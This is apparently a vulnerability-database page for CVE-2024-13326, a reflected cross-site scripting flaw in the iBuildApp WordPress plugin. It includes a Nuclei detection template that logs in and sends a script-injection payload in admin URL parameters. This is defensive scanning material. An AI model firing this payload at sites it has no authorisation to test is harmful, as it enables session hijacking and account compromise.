| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-13326 | 4 Feb 202506:08 | – | circl | |
| WordPress plugin iBuildApp 安全漏洞 | 4 Feb 202500:00 | – | cnnvd | |
| CVE-2024-13326 | 4 Feb 202506:00 | – | cve | |
| CVE-2024-13326 iBuildApp <= 0.2.0 - Reflected XSS | 4 Feb 202506:00 | – | cvelist | |
| EUVD-2024-51531 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-13326 | 4 Feb 202506:15 | – | nvd | |
| CVE-2024-13326 | 4 Feb 202506:15 | – | osv | |
| WordPress iBuildApp plugin <= 0.2.0 - Reflected XSS vulnerability | 4 Feb 202522:19 | – | patchstack | |
| PT-2025-2112 | 4 Feb 202500:00 | – | ptsecurity | |
| CVE-2024-13326 | 8 Feb 202504:36 | – | redhatcve |
id: CVE-2024-13326
info:
name: iBuildApp <= 0.2.0 - Reflected Cross-Site Scripting
author: Sourabh-Sahu
severity: medium
description: |
iBuildApp WordPress plugin through 0.2.0 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
impact: |
Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
remediation: |
Update to version 0.2.1 or later, where input sanitization and output escaping are properly implemented.
reference:
- https://wpscan.com/vulnerability/dc1f755e-63f2-4f5d-a50e-9e2c589e6e4f/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13326
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13326
cwe-id: CWE-79
epss-score: 0.00567
epss-percentile: 0.42925
cpe: cpe:2.3:a:ibuildapp:ibuildapp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
tags: cve,cve2024,wordpress,wpscan,wp-plugin,ibuildapp,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, 'wordpress_logged_in')
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=ibuildapp-iframe-redirect&noheader=true"></script><script>alert(document.domain)</script><script>&targetPage=ibuildapp-app-publishing"></script><script>alert(document.domain)</script><script>&to HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "></script><script>alert(document.domain)</script><script>")
condition: and
# digest: 490a004630440220414c07be66a7e136540cd3e70640502d3a1a8c11608bb05519c3ef4fc583d47a0220480384a499a8d8cd99165fb3f42ef8e2ad5134cb656c5e897efaf2d0cb73c0bd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation